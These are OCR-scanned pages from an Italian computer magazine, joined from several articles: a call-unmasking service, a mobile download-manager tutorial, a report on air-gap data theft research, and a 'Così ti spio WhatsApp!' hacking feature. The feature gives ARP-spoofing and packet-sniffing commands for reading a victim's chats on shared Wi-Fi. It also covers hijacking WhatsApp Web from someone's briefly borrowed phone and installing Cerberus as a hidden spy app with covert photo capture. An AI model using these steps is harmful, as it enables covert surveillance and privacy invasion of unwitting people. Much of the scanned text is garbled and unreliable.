^"deviazione su occupato". In questo modo il ge¬ 
store dell'utente "indirizza" la chiamata che aveva 
spedito all'utente verso il centro di smistamento 


(Trunk SS7) corrispondente al numero geografico 
selezionato dall'utente per la deviazione su occu¬ 
pato (numero di Whooming in questo caso). A sua 
volta i server di Whooming ricevono la segnalazione 
di una chiamata anonima e prendono in carico il 
numero da smascherare. Verificano le opzioni atti¬ 
vate dall'utente e, in mancanza di altre istruzioni, si 
limitano a smascherare il chiamante disturbatore 
e a terminare immediatamente la chiamata.Tutte 
queste operazioni sono "invisibili" al disturbatore 
che otterrà il solo tono di occupato senza alcun 
addebito in bolletta. 


Cosa succede se viene attivata la funzione "Parla 
con lo stalker"? 

Il server di Whooming che ha ricevuto la chiamata 
avvia immediatamente una telefonata parallela, su 
un nuovoTrunk SS7 verso l'utente che dovrà riceve¬ 
re la chiamata. Il chiamante continua a sentire il te¬ 
lefono che"squilla libero"e non appena Whooming 
riesce a chiamare effettivamente l'utente cercato, 
mette i due in comunicazione in modo trasparente 
per il chiamante. Ma qui in realtà è successa già la 
magia, l'utente chiamato sta parlando con lo stal¬ 
ker conoscendone già il reale numero di telefono. 
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Ti regaliamo l'app per gestire al meglio i download con 
lo smartphone Android. anche dalle reti Peer to Peer occorre 


A A ■ ■ Arr ANUHUIU 

Scarica a nulle ^ 

it/link/3204 

col cellulare 


A l giorno d'oggi è impensabile ri¬ 
uscire a scaricare file da Internet 
senza ricorrere ad un download 
manager, ovverosia un programma cre¬ 
ato apposta per il download dalla Rete. 
Chi non ha dimestichezza con applica¬ 
zioni Peer to Peer come eMule o piTorrent 
(e affini) sa bene quanto può essere fru¬ 
strante arrivare al 95% di un download 
col browser ed essere fulminati dal mes¬ 
saggio "il server ha interrotto la connes¬ 
sione". Per non parlare di quando erro¬ 
neamente chiudiamo Chrome o Explorer 
dimenticando che stavamo scaricando 


l'ultimo episodio della nostra serie TV 
preferita o, ancor peggio, quando un'at¬ 
tività ci fa andare in blocco il sistema co¬ 
stringendoci a riavviare. 

Il download è mobile 

In ambiente PC i download manager si 
sprecano: uno dei più popolari è sicura¬ 
mente JDownloader che, oltre a gestire 
i download da browser, supporta anche 
i file torrent e i servizi di file hosting co¬ 
me Rapidshare. Ma ve ne sono per tutti i 
gusti e le maniere, come Wget, popola¬ 
re in ambiente Linux, e Free Download 


Manager, anche quest'ultimo con sup¬ 
porto ai file torrent. Effettivamente si 
sentiva il bisogno di un programma del 
genere anche in un mondo relativamen¬ 
te nuovo ai download come quello degli 
smartphone e dei tablet. E non c'è dub¬ 
bio che l'arrivo di connettività sempre più 
spinte come il 4G abbia portato anche tra 
i dispositivi mobile l'esigenza di un sof¬ 
tware dedicato alla gestione dei down¬ 
load. La soluzione che abbiamo scovato 
si chiama PowerDownloads, un'app ma¬ 
gica che permette di cercare e scaricare 
qualsiasi file direttamente dal cellulare. 


Attiviamo la promozione 

Scopriamo come installare PowerDownloads in tre passi e come applicare la promo riservata ai lettori di Win 
Magazine per eliminare completamente i banner pubblicitari che compaiono nella sua interfaccia principale. 



-v Una semplice installazione 

Avviamo il Play Store di Google, troviamo 
l’app PowerDownloads e installiamola. Al 
primo avvio l'applicazione ci guiderà in un veloce 
tutorial guidato per apprenderne le principali funzio¬ 
nalità. Tappiamo sul pulsante Prossimo fin quando il 
wizard non verrà completato. 


- - - 

- B 'f. , • 

«- lo coda 

Promozioni & Consorti 

_ POWHOM» _ ■ 

Mtn i : ••• ¥c«wc* 

sn fnli 




• ■ 

svisato 

W VopoaJaikyu 


O Promozioni 


O Infama/ioni 

Mnmaga/rfM magar me 


q w e r t y u i o p 


a s d 1 g h | k 1 


♦ zxcvbnm 4 " 

| 

• 1 


Togliamo la pubblicità 

2 Raggiungiamo il menu principale toccando 
l'icona a sinistra e tappiamo su Promozioni. 
Nella casella Inserisci il tuo codice digitiamo il cou¬ 
pon winmagazine e tappiamo poi sul pulsante Veri¬ 
fica. La successiva conferma eliminerà dall'app tutti 
i banner per un intero mese. 



Quali reti vogliamo utilizzare 

Tappiamo quindi sulla voce Rete dal menu 
Impostazioni, raggiungibile con un tocco 
sull'icona in alto a sinistra. Qui facciamo attenzio¬ 
ne a togliere la spunta su Usa connessioni mobili 
2G/3G/4G nel caso in cui non desideriamo utilizzare 
la rete mobile per il download. 
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Il browser per i download 

Scopriamo come sfruttare le funzioni di navigazione Web di PowerDownloads per cercare in Rete i contenuti da 
scaricare. Grazie alla semplice interfaccia utente pensata per lo scopo sarà davvero un gioco da ragazzi. 



Un tool specializzato 

Nel menu principale tappiamo sulla voce 
Power Browser e nella barra degli indirizzi 
digitiamo il nome del sito desiderato facendoci aiuta¬ 
re dalla funzione di autocompletamento. Completata 
la digitazione, tappiamo sulla freccia accanto per rag¬ 
giungere il sito in questione. 



^ Gestiamo i download 

^ Se vogliamo cancellare un download in corso 
non dobbiamo fare altro che tenere premuta 
per qualche secondo la relativa scheda e poi tappa¬ 
re sull’icona del cestino. Accedendo invece al menu 
principale dell'app mediante l’icona con i tre puntini 
potremo metterlo in pausa o riavviarlo. 



Nij",-., 


Download 




^ I nostri seanalibri 

2 Per raggiungere facilmente l'indirizzo le 
prossime volte tappiamo sull’icona di menu 
del browser in alto a destra e selezioniamo la voce 
Aggiungi segnalibro. Confermiamo la finestra succes¬ 
siva modificando i dati dove necessario e tappando 
infine sul pulsante OK. 


^ Scarichiamo il nostro file 

Individuiamo il collegamento al file interessa¬ 
to e tappiamoci sopra. Si aprirà una finestra 
dal titolo Nuovo download. Qui possiamo verificare la 
tipologia del file che ci interessa e le sue dimensioni. 
Quindi possiamo iniziarne il download tappando sul 
pulsante Scarica. 



^ Download anche in manuale 

g Premesso di conoscere il percorso del nostro 
contenuto, possiamo scaricare il file selezio¬ 
nando dal menu principale la voce In coda e tappan¬ 
do poi sul pulsante + in basso a destra. Nella finestra 
successiva scriviamo l’indirizzo del contenuto e tap¬ 
piamo sul pulsante Apri. 


^ Riproduzione in tempo reale 

Selezioniamo un collegamento che contenga 
un file video. Nella finestra di download sarà 
presente una nuova voce: Streaming. Tappiamoci 
sopra. L'applicazione ci chiederà di scegliere il player 
per riprodurlo: optiamo per quello predefinlto Power¬ 
Downloads Player. 


PRIMA SCARICHI... E POI MANDI IN STREAMING! 


L'app PowerDownloads permette di 
interfacciarsi anche con la Google 
Chromecast per riprodurre in diretta 


via Internet sul televisore di casa i 
contenuti multimediali che stiamo 
scaricando, persino prima dei loro 


completamento. Innanzitutto, se 
non l'abbiamo ancora fatto, inse¬ 
riamo la Chromecast nella porta 
HDMI del televisore e selezionia¬ 
mo il canale HDMI corrisponden¬ 
te. Se la chiavetta è correttamente 
configurata dovrebbe collegarsi in 
automatico alla rete Wi-Fi di casa. 
Raggiungiamo quindi un contenuto 
video sul PowerBrowser come visto 
nella guida precedente. Tappiamo 
sul link, selezioniamo Streaming e 
09 PowerDownloads. L'icona della 
Chromecast in alto a destra del ri- 


o 


il video sul pennino di Google. In 
pochi secondi il video verrà ripro¬ 
dotto sul televisore oscurando la 
finestra di riproduzione di Power¬ 
Downloads. A questo punto pos¬ 
siamo controllare la riproduzione 
della Chromecast direttamente col 



produttore ci permetterà di deviare telecomando del televisore. 
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SgHiilare si 


qua lsiasi 


C’è chi sbircia nei nostri dati 
intercettando le onde radio del 
monitor. Svelati i retroscena 


Sf>y 


pc I 


o 
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I computer più protetti del mondo sono colloca¬ 
ti in sistemi "air gap". Più che di sistemi, parlia¬ 
mo di una serie di rigide regole che indicano, 
per esempio, che un computer di questo tipo non 
deve essere collegato a un altro computer o a una 
rete (men che meno se si tratta di Internet). E che, 
tra un computer di questo tipo e il successivo, ci 
deve essere una certa distanza, che determina, 
appunto l’air gap. Esagerato? Per il nostro com¬ 
puter sì, ma se parliamo di quelli che gestiscono 
centrali nucleari, o postazioni lancia-missili, è 
chiaro che la sicurezza non è mai troppa. E per 
sicurezza, intendiamo l'essere isolati e protetti 
da manomissioni hacker e malware. 


Sicuri, ma non troppo 

Nel corso degli anni, tuttavia, vari ricercatori 
hanno sperimentato tecniche più o meno eso¬ 
tiche per scardinare i sistemi air gap, anche se 
nessuno si è spinto in là come il ricercatore di 
sicurezza Mordechai Curi e il professor Yuval 
Elovici, della Ben- Gurion University di Israele. 
I due, infatti, hanno sviluppato un raffinato 
metodo per rubare i dati da un computer air gap 
sfruttando un comune smartphone, in tutto e 
per tutto simile a quello che ogni giorno por¬ 
tiamo nelle nostre tasche e nelle borse delle 
signore. Non solo: visto che i sistemi air gap pre¬ 
vedono che si debba depositare lo smartphone 
all'ingresso della stanza che contiene i preziosi 
computer, i due ricercatori hanno fatto in modo 
che il loro sistema, chiamato AirHopper, tenesse 
conto di questa limitazione. E funziona, caspita 
se funziona. Il punto è: come? 


Onda su onda 

Prima di spiegarlo, facciamo un passo indietro. 
Da ormai parecchi anni si sa che i monitor dei 
nostri computer (ma anche i televisori di casa 
e, più in generale, tutti i display dei dispositivi 
hi-tech), chi più chi meno, emettono onde radio. 
Senza scendere in pesanti tecnicismi, prendia- 
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mo per assodato questo fatto e teniamone conto. 
Ora pensiamo al nostro smartphone: tra le tante 
funzioni presenti, quasi di sicuro c'è anche 
quella di Radio FM. Che, di fatto, trasforma 
il dispositivo in un ricevitore di onde radio. Il 
che, tradotto, significa che uno smartphone 
potrebbe ricevere le onde radio scaturite da un 
monitor. Ora, dato che queste onde variano in 
base a ciò che viene visualizzato dall’utente, 
dotando lo smartphone di un’apposita appli¬ 
cazione in grado di decodificarle, è possibile 
risalire al contenuto mostrato dal computer. 
Capito quanto sono stati furbi questi due ricer¬ 
catori? Utilizzano lo smartphone per ricevere 
e decodificare le onde radio provenienti dal 
monitor collegato al computer air gap! Il fatto, 
poi, che un PC di questo tipo sia, per definizione, 
collegato a un proprio monitor, rende il metodo 
di Curi ed Elovici ancora più efficace. Rimane 
un dubbio: ma non avevamo detto che gli smar¬ 
tphone vanno depositati all'ingresso di una 
stanza con sistemi air gap? Nessun problema: 
il metodo sviluppato dai due geniacci israeliani 
funziona fino a una distanza massima di circa 
sette metri, con prestazioni tra i 13 e 60 byte al 
secondo (quanto basta per rubare informazioni 
sensibili). Considerato che i sistemi air gap, di 
solito, sono relegati in stanze piuttosto piccole, 
quello di Curi ed Elovici è un metodo che mette 
in seria discussione la sicurezza degli air gap. 
E, quindi, di centrali nucleari, sistemi militari 
e via dicendo. Uno scenario da brividi, vero? 


COS'È E COME FUNZIONA IL SISTEMA 
DI PROTEZIONE AIR GAP 


Tecnicamente, un air gap, o air wall, è un sistema 
che isola un computer, o una rete, da un sistema 
informatico potenzialmente vulnerabile, e quindi 
collegato a Internet. A volte, questa soluzione così 
estrema va incontro a qualche compromesso. Per 
esempio, la trasmissione dei dati può avvenire dal 
sistema air gap all'esterno, ma non il contrario, 
sfruttando una protezione crittografica di alto 
livello. Pervia dell'elevata sicurezza, i sistemi air 
gap sono utilizzati non solo per scopi militari, 
ma anche in ambito finanziario e industriale. 
Per esempio, nei sistemi SCADA. Dove, tuttavia, 
è stata dimostrata una grave vulnerabilità col 
ben noto malware Stuxnet. Oltre che sfruttando 
le onde radio come visto in questo articolo, i 
sistemi di protezione basati su tecniche di air 
gap possono essere "bucati" anche sfruttando 
il calore. A dimostrarlo sono stati ancora 
una volta i due ricercatori israeliani Guri 
ed Elovici, che hanno chiamato BitWhi- 
sper questa tecnica. In pratica, i due 
sono partiti dal presupposto che un 
computer durante il suo funzionamento 
genera una quantità variabile di calore 
a seconda che si utilizzi un videogioco 
o un programma di videoscrittura come 
Word.Tuttavia, per evitare che ci siano 
dei picchi pericolosi, il computer è dotato 
di una serie di sensori che, in ogni istante, rile¬ 


vano e comunicano le variazioni di temperatura. 
Ora, mettiamo che queste variazioni diventino 
la base di un sistema di comunicazione, stile 
Codice Morse: cambiando la temperatura di un 
computer, sarebbe possibile inviare dei messaggi 
o, addirittura, dei comandi. BitWhisper si basa su 
questo concetto: un malware infetta un computer 
A e uno B. Il computer A, quindi, sotto controllo 
del malware, cambia temperatura. Se il compu¬ 
ter B si trova a una distanza inferiore ai 40 cm, 
risentirà di queste variazioni di calore, variando 
di conseguenza la propria temperatura. Il mal¬ 
ware presente nel computer B, quindi, riconosce 
questi cambiamenti e li interpreta come 

comandi veri ^ /—v, e propri. 




COSÌ AVVIENE UN FURTO A ONDE RADIO 


Ecco, in pratica, come il sistema AirHopper riesce a sgraffignare dati a un computer protetto mediante un sistema basato 
sulla tecnica dell'air gap, sfruttando un semplice smartphone dotato di un'apposita app di decodifica. 



Co smaitplwt.iW'mdtlk baiato ^ fi 



Co, tecnica, ftu/ifiìoruL conte, eauetdìoppùw, , dai pei, inteìcettaie, 

icheimo. diente, icoìiibande. 



t>ul ditco fiitòo, ma, quanto batta,, pei, etempio pei, inteicettaie, 
dò che, tòme, iciitto con, un,piombammo, di elabotafiìone, tetti. 
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CHI C'È DIETRO 
AIRHOPPER 



Yuval Elovici è il professore della Ben-Gurion 
University che ha avviato la ricerca sulle tecniche 
di violazione dei sistemi di sicurezza air gap. 

Dietro a questa grossa ricerca che ha portato alla 
scoperta di un metodo di attacco dei sistemi di 
sicurezza basati sulla tecnica dell'airgapc'è, co¬ 
me detto, lo zampino del professor Yuval Elovici, 
uno che di sicurezza informatica ne sa a pacchi. 
Laureatosi alla Ben-Gurion University in inge¬ 
gneria elettrica e informatica, nel 1989, Elovici 
ha dedicato la carriera professionale a studiare 
i sistemi di protezione di apparati elettronici. 
Attualmente, nella medesima università, riveste 
il ruolo di direttore d ei Deutsche-Telekom Labo¬ 
ratories. Tra i suoi lavori più celebri, un sistema 
che limita l'accesso a documenti trafugati, sfrut¬ 
tando il sistema di identificazione dei malware. 
E poi, diversi studi nel campo dell'intelligenza 
artificiale, per approdare, proprio quest'anno, 
al mondo dei computer air gap, facendo da 
chioccia al suo studente Mordechai Guri. 
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PeR i veRi maniaci della sicuRezza, o peR chi ha 
gRossi segReti da nascondeRe, ecco qualche 
tRucco (paRanoico) peR cReaRe un sistema molto 
simile a un veRo aiR gap. 

1) In un computeR nuovo di zecca, installa un f iRe- 
wall da disco, senza collegaRti alla Rete. A meno 
di usaRe quello integRato nel sistema opeRativo. 

2) Collegati a InteRnet il meno possibile. Se puoi, 
connettiti una volta sola, a casa di un amico, peR 
scaRicaRe tutto ciò che di cui hai bisogno. E poi, 
stop. 

3) Se pRopRio devi collegaRti alla Rete, utilizza un 
sistema VPN, o di cRittazione come TOR. 

H; Disabilita tutti i pRogRammi a esecu¬ 
zione automatica. 





5 Utilizza pochi file eseguibili. Nei 
veRi computeR in aiR gap si utilizzano 
quasi esclusivamente file di testo molto 
semplici, come i TXT. 


lo) Se utilizzi memoRie esteRne, fai in modo che 
siano nuove di zecca. Guai a quelle pRestate o 
tRovate “casualmente”. 


T PRefeRisci CD, DVD e Blu-Raq alle memoRie 
esteRne peR tRasf eRiRe dati da e peR il tuo 
computeR. 

t) Codifica tutti i file che tRasfeRisci da e peR il 
tuo computeR. 






Una. volta, che. L app L in etecugione., nwtt&eUi qiialtiaiì, metiag- 
<jio uitualiggato iulmonitoi,del ( PC in. ab.gap. Quoti, i/l tempo 
tenie., e, tenga, alcun tipo di connettione. LUl- Ut. idcU/oppei. i 
dawein un tittema. tapinato e. diabolico ! 


Speciali Win Magazine 91 











O Così fa Thacker 


Fai da te | Così ti spio WhatsApp! | 


Così ti spio 
WhatsApp! 

Un pirata informatico ci ha mostrato quanto è facile 
prendere possesso degli account altrui e leggerne 
tutti i messaggi. Eccoti svelate tutte le nuove tecniche 


ATTENZIONI 

Ricordiamo che violare le 
reti e gli account altrui è un reato V 

skssssshs 

a titolo illustrativo e possono essere 

messe in pratica solo sui nostri y 
dispositivi o su quelli di amici 
■ informati di quanto stiamo 
facendo. > 




U na delle leggi non scritte dell’in- 
formatica prevede che più una 
certa tecnologia ottiene favore 
di pubblico, maggiore è la probabilità 
che qualche malintenzionato cerchi di 
utilizzarla per far circolare malware 
divario tipo (virus, worm, trojan e via 
dicendo). WhatsApp è una delle appli¬ 
cazioni di messaggistica istantanea più 
utilizzate dagli utenti di smartphone e 
tablet, quindi era abbastanza scontato 
che i pirati informatici cominciassero 
a prenderla di mira. 

Non è la prima volta 

In realtà, sta già succedendo da qual¬ 


che tempo: oltre due anni fa era com¬ 
parso il malware Priyanka. Si trattava 
di un semplice worm che si presentava 
ad un utente sotto forma di nuovo 
contatto: appena il malcapitato accet¬ 
tava di inserire Priyanka nella propria 
rubrica, il worm cancellava tutti i con¬ 
tatti della rubrica sostituendoli con se 
stesso. Non provocava, dunque, veri e 
propri danni economici o lesioni della 
privacy, ma era certamente fastidioso. 
Priyanka, però, ha aperto la strada 
a qualcosa di molto più pericoloso: 
sulla sua stessa falsa riga, infatti, è 
stato recentemente scoperto un altro 
malware il quale, tuttavia, presenta 


un rischio non indifferente per la pri¬ 
vacy degli utenti. Priyanka, infatti, si 
basava sull'accettazione diunavCard, 
ovvero un biglietto da visita elettro¬ 
nico. Il malware si presentava alle 
sue vittime con il proprio biglietto da 
visita e quando queste lo accettavano 
cominciava a modificare la rubrica 
di WhatsApp. Era una sorta di proof 
of concept, cioè un test sul funziona¬ 
mento di un malware: avrebbe potu¬ 
to provocare enormi danni, ma non 
lo faceva. In un certo senso, serviva 
soltanto a dimostrare la fattibilità di 
questo tipo di attacco nei confronti 
di WhatsApp. 


CRONISTORIA ILLUSTRATA DI UN ATTACCO AL NOSTRO ACCOUNT SU 





Il pirata prepara un programma eseguibile (per esem¬ 
pio il classico EXE oppure uno script BAT per Win¬ 
dows) e lo traduce non in codice binario ma in codi¬ 
ce base64. 


Il pirata sceglie un numero telefonico da prendere 
di mira (ogni account WhatsApp è associato ad un 
numero). Naturalmente, può tirare a caso con un 
generatore casuale di numeri telefonici. 


L’utente ‘Vittima” viene contattato dal pirata, che gli 
propone una biglietto da visita elettronico in formato 
vCard (che poi è un semplice testo scritto in un parti¬ 
colare linguaggio) per presentarsi. 
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Il pericolo adesso è reale 

Negli ultimi tempi, invece, si sta diffondendo 
un malware ben più pericoloso, in quanto si 
tratta di uno spyware vero e proprio e non 
più un worm: non si limita quindi ad esse¬ 
re fastidioso, ma piuttosto ruba fotografie e 
informazioni personali. Questo spyware si 
diffonde anch’esso mediante finti biglietti 
da visita in formato vCard ed è stato appo¬ 
sitamente progettato per la versione Web di 
WhatsApp: basta accettare il biglietto da visita 
malevolo per essere infettati. Una volta che 
il nostro account viene compromesso dallo 
spyware, il programma può leggere le nostre 
conversazioni e prelevare le nostre fotografie 
o i video. E gli autori dello spyware possono 
avere accesso a tutti questi dati, facendone 
ciò che vogliono: anche caricare le nostre foto 
private sul Web. E non è detto che ciò avvenga 
subito: il pirata, infatti, potrebbe decidere 
di pubblicarli anche tra qualche tempo e, 
quando meno ce lo aspettiamo, potremmo 
ritrovare le nostre immagini su siti a dir poco 
inattendibili. 

Attenti al falso messaggio 

Ma è stato scoperto anche un altro malware 
che colpisce gli utenti WhatsApp (questa 
volta nella versione app per smartphone), 
utilizzando un metodo tanto comune sulle 
varie chat da essere quasi banale: un falso 
messaggio. Gli utenti vittime si sono visti 
arrivare un messaggio che indicava la pre¬ 
senza di un messaggio vocale registrato nella 


segreteria, corredato da un pulsante con 
la scritta “Ascolta il messaggio". E, ovvia¬ 
mente, appena gli utenti cliccano su quel 
pulsante vengono indirizzati ad una pagi¬ 
na Web ricca di malware di vario genere. Il 
principio di funzionamento è più o meno lo 
stesso di quelle e-mail che contengono un 
link per ottenere una pillola miracolosa che 
fa dimagrire in dieci minuti mangiando un 
cinghiale arrosto, ma poi ci reindirizzano al 
download di uno spyware (magari il classico 
file "importante.pdf.exe"). 

Impariamo a difenderci 

Per evitare questi malware è sufficiente non 


Quali sono i rischi per un utente che usa 
WhatsApp, sia nella versione Web sia in quel¬ 
la per smartphone? O, per meglio dire, quali 
sono i punti deboli di questa applicazione di 
messaggistica istantanea? Innanzitutto, un 
problema "tecnico" è dato dall'assenza di un 
sistema valido di crittografia sicura: i messag¬ 
gi che inviamo su WhatsApp non vengono 
infatti protetti in alcun modo (diversamente 
da quanto accade invece con l'applicazione 
concorrenteTelegram, disponibile per Android, 
iOS e Windows Phone) quindi un eventuale 
malintenzionato che riesca ad intercettare le 
nostre comunicazioni sarà in grado di leggere 
i messaggi. Ma il problema principale è di tipo 


accettare i biglietti da visita digitali di persone 
che non conosciamo e non cliccare su alcun 
pulsante di "segreteria", visto che WhatsApp 
non ha una segreteria telefonica. Sono due 
semplice norme di buon senso, che tuttavia 
molti utenti non seguono: sono infatti milioni 
(una stima parla di 200 milioni) gli utenti caduti 
vittima di questi malware. Il problema è che 
per quanto sicuro possa essere un programma 
di per se stesso, avrà sempre un punto debole: 
l’utente, che è capace di fare qualcosa di sciocco 
e vanificare tutti gli sforzi dei programmatori 
per migliorare la sicurezza. In questo senso, il 
racconto del pirata può aiutarci ad evitare di 
cadere nelle sue stesse trappole! 


psicologico e sociale: WhatsApp consente a 
chiunque di contattare chiunque, permettendo 
agli utenti di riconoscersi soltanto tramite il 
numero telefonico. Questo avvantaggia i pirati, 
che possono facilmente scoprire il numero 
telefonico di una vittima e poi contattarla. E 
svantaggia gli utenti, che non hanno molti 
elementi per capire con chi stanno parlando: 
naturalmente ci si dovrebbe insospettire qualo¬ 
ra ricevessimo un messaggio da una persona o 
da un numero telefonico che non conosciamo. 
Ma gli utenti hanno spesso troppa fiducia in 
un sistema che appare sicuro e tendono ad ac¬ 
cettare amicizie e contatti da chiunque, prima 
ancora di verificarne l'identità. 


TUTTI I PERICOLI DI WHATSAPP 


WHATSAPP WEB BASATO SU FINTI BIGLIETTI DA VISITA 



L’utente clicca sul biglietto da visita contenente una 
fotografia memorizzata come codice base64. Però non 
è una vera foto: il pirata ha inserito al suo posto il codi¬ 
ce base64 del suo programma eseguibile. 


All'apertura del biglietto vCard la finta fotografia viene 
scaricata ed aperta sul computer dell’utente. Tuttavia, 
non apparirà alcuna immagine: invece, il codice rea¬ 
lizzato dal pirata verrà eseguito dal sistema operativo. 


Il programma del pirata è in esecuzione, quindi può 
leggere l’elenco dei file personali dell'utente, trovare la 
cartella che contiene le immagini della Webcam, zip- 
paria e inviarla vìa FTP al computer del pirata. 
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IL MODO PIÙ SEMPLICE PER SPIARE LE CHAT SU WHATSAPP 


L'introduzione della versione Web del client 
di messaggistica ha facilitato il compito agli 
spioni. E purtroppo difendersi è diventato più 
difficile. Tutti noi che usiamo WhatsApp siamo 
dunque a rischio intercettazione e qualunque 
malintenzionato, in poco tempo, può prendere il 
controllo del nostro account. Per farlo, gli basta 
avere tra le mani lo smartphone della vittima 
per alcuni secondi. Avvia quindi WhatsApp e, dal 
menu Impostazioni, tappa su WhatsApp Web. 


« a 

D0 »4ì ■ 10:04 I 


Nuovo gruppo 


Nuovo broadcast 

A 

WhatsApp Web 

Va bene da\ 

Stato 

Andrea Se 

Impostazioni 


Sul suo computer si collega quindi al sito ht- 
tps://web.whatsapp.com e scannerizza con 
lo smartphone della vittima, usando il lettore 
integrato in WhatsApp stesso, il QR Code che 
appare sul monitor. 



Può quindi rimettere a posto il telefono della vit¬ 
tima e leggere indisturbato le sue conversazioni. 



La vittima, a questo punto, ha solo un modo per 
accorgersi che qualcuno lo sta spiando e prende¬ 
re le giuste contromi¬ 
sure: dal menu Impo¬ 
stazioni di WhatsApp 
deve tappare di nuovo 
su WhatsApp Web. Se 
nella schermata che 
appare risultano com¬ 
puterconnessi che non 
sono i suoi, deve imme¬ 
diatamente tappare su 
Disconnetti da tutti i 
computer. 



Così intercettano le nostre Chat 

Se il pirata si trova nella nostra stessa rete Wi-Fi può intercettare tutto il traffico Internet, compreso quello 
delle chat. Meglio usare l’app su reti protette con chiavi WPA e stare alla larga dalle reti pubbliche o aperte. 



La vittima è stata scelta 

Per prima cosa, il pirata si procura un 
sistema operativo progettato apposita¬ 
mente per il penetration testing, come Kali (www. 
kali.org). Scaricata la ISO, la scrive su una pen- 
drive con il programma Unetbootin (https://unet- 
bootin.github.io). Il pirata avvia il proprio com¬ 
puter dalla pendrive USB di Kali e cerca di con¬ 
nettersi ad una rete Wi-Fi libera (od eventual¬ 
mente cerca di bucarne una, se ha tanto tem¬ 
po). Entrato nella rete, cerca una possibile vittima 
e lancia il comando arpspoof -t 192.168.1.53 
192.168.1.1. 



^ Aspirazione dati in corso 

Nell’esempio, 192.168.1.53è l'indirizzo 
della vittima, mentre 192.168.1.1 è quello 
del router. Con il comando precedente il pirata ha 
diretto verso di se il traffico che va dalla vittima al 
router. Ora deve fare il contrario aprendo un altro 
terminale e scrivendo arpspoof -t 192.168.1.1 
192.168.1.53. Il pirata deve ora aprire ancora 
un altro terminale e dare il comando di inoltro 
del traffico Internet: echo 1 > /proc/sys/net/ip_ 
forward. Grazie a questo, l'utente vittima non si 
accorgerà del furto di dati, continuando a naviga¬ 
re su Internet. 



^ Eccole chat e le foto 

Il pirata può finalmente aspirare tut¬ 
to il traffico Internet della vittima, con il 
comando tcpdump -/' wlanO -I -X che mette in 
chiaro il testo dei pacchetti TCP che viaggiano 
tra la vittima e il router, quindi anche i messaggi 
di WhatsApp Web. Non solo: il pirata può anche 
vedere le immagini che l'utente sta ricevendo o 
inviando tramite un browser Web oppure trami¬ 
te WhatsApp. Tutto ciò che deve fare è lanciare 
il comando driftnete una finestra apparirà sullo 
schermo del pirata, popolandosi con le immagini 
della vittima! 


94 Win Magazine Speciali 

































Così ti spio WhatsApp! | Fai da te 


Così fa l'hacker O 


Cerberus al servizio dei 

Un’applicazione nata per configurare un vero e proprio antifurto mobile e prot 
diventare una arma a doppio taglio nella mani del pirata. Ecco in che modo. 



premendo questo pulsante 


Abilita amministratore dispositivo 


Inoltre puoi far s) che Cerberus sì attivi 
automaticamente se il tuo dispositivo è usato 
con una SIM card non autorizzata. Per 
configurare premi il pulsante sotto. 


Configurazione SIM checker 


^ L’app è sul Google Piavi 

L’applicazione che il pirata può utilizzare per 
spiare una vittima è normalmente usata per 
controllare il proprio smartphone in caso di furto. Quin¬ 
di, per cominciare, il pirata deve mettere le mani sullo 
smartphone della vittima, assicurarsi che sia rootato e 
installare l’app Cerberus. 


^ onfiqurazione truffaldina 

Affinché Cerberus funzioni correttamente, 
deve essere configurato. Il pirata deve quindi 
aprire l’app e seguire la procedura guidata. La prima 
configurazione da fare è scegliere un indirizzo e-mail 
ed una password per l’account Cerberus, poi si pos¬ 
sono abilitare le funzioni da amministratore. 


* ▼ 

a 5:11 

= Automatic photo capture 

★ 

Screen color 

Choose il you wanl a black screen or white screen to be 
displayed while taking a preture 

Wrong unlock code 

Take a picture if thè user enters a wrong unlock 
pattern/ PIN/password 

B 




il proprio smartphone può 


- Configura Cerberus 


Stato: Abilitata 

Clicca qui per disabilitare 
l'amministrazione dispositivo, in modo 
che tu possa disinstallare Cerberus. 


Wipe 


Consenti a Cerberi 
lèi memoria del tur 


is di cancel 
dispositive 


* 


^ Il pirata si copre le spalle 

Si possono poi abilitare delle funzioni aggiunti¬ 
ve, come il wipe da remoto, ovvero la possibili¬ 
tà di eliminare tutti i dati dello smartphone da remoto. 
Questa opzione potrebbe essere utile per il pirata, per 
non lasciare tracce dell’installazione di Cerberus se 
teme di essere scoperto. 



^ Cosici ruba le foto 

^ La funzione più interessante, per il pirata che 
vuole spiare le conversazioni di un utente, è 
il cattura foto automatica o anche /’,Automatic pho- 
to capture. Qui è importante modificare il colore dello 
schermo impostandolo a trasparente, per evitare che 
l’utente di accorga di qualcosa. 


^ Smartphone sotto controllo 

Il pirata spunta l’opzione Nascondi dalla lista 
applicazioni, per evitare che l’utente scopra 
che l’app Cerberus è installata sul proprio smartphone. 
Può poi connettersi al sito cerberusapp.com e accede¬ 
re con il proprio indirizzo e-mail e la password all’ac- 
count creato al Passo 2. 


^ Le nostre Chat in chiaro 

Selezionando il dispositivo da controllare, 
il pirata deve solo scegliere l’azione Grab 
screenshot dall'apposito menu a discesa. All'indiriz¬ 
zo e-mail associato all’account Cerberus verrà invia¬ 
to lo screenshot attuale: se l’utente sta utilizzando 
Whatsapp, il pirata può vedere la schermata. 


LE 5 REGOLE D ORO PER NON FARSI SPIARE SU WHATSAPP 

Facendo tesoro delle tecniche di attacco del pirata analizzate nelle pagine precedenti, possiamo imparare 
a prendere le giuste precauzioni per blindare il nostro account di messaggistica istantanea. 


1 Usiamo sempre ii buon senso! Come nella vita 
reale, non fidiamoci mai di utenti sconosciuti 
che ci inviano messaggi e biglietti da visita sulla 
versione Web di WhatsApp. Se ne riceviamo uno, non 
apriamolo: casomai, proviamo prima a contattare il 
mittente via chat per sincerarci della sua reale identità. 
Ricordiamoci di tenere sempre aggiornato l'an- 
tivirus sul nostro computer: eventuali file infetti 
inviatici come allegati di messaggi suWhatsAppWeb 
verranno individuati ed eliminati se ritenuti pericolosi. 


3 Analogamente alle precauzioni da prendere con 
le e-mail di phishing, quando usiamo WhatsApp 
nella versione Web o app mobile, evitiamo di cliccare 
eventuali pulsanti di"segreteria"che compaiono nei 
messaggi. L'app non ha una segreteria telefonica. 
Aprendo il link potremmo finire su siti malevoli ed 
essere invasi da virus di ogni genere. 

Ricordiamoci sempre di attivare il blocco del¬ 
lo schermo sullo smartphone utilizzando una 
password o un codice PIN: in questo modo, anche se 


lasciamo incustodito il telefono, possiamo rendere la 
vita più difficile al pirata intenzionato a prenderne il 
controllo per installare di nascosto app di controllo 
da remoto come Cerberus. 

Aggiorniamo sempre WhatsApp all'ultima ver¬ 
sione: ad ogni upgrade, infatti, gli sviluppatori 
correggono non solo eventuali malfunzionamenti 
dell'interfaccia grafica, ma anche falle di sicurezza 
e aggiungono funzioni molto utili per proteggere 
meglio la nostra privacy. 




Speciali Win Magazine 95 



























O Così fa Thacker 


Fai da te | Fai incetta di app a costo zero 


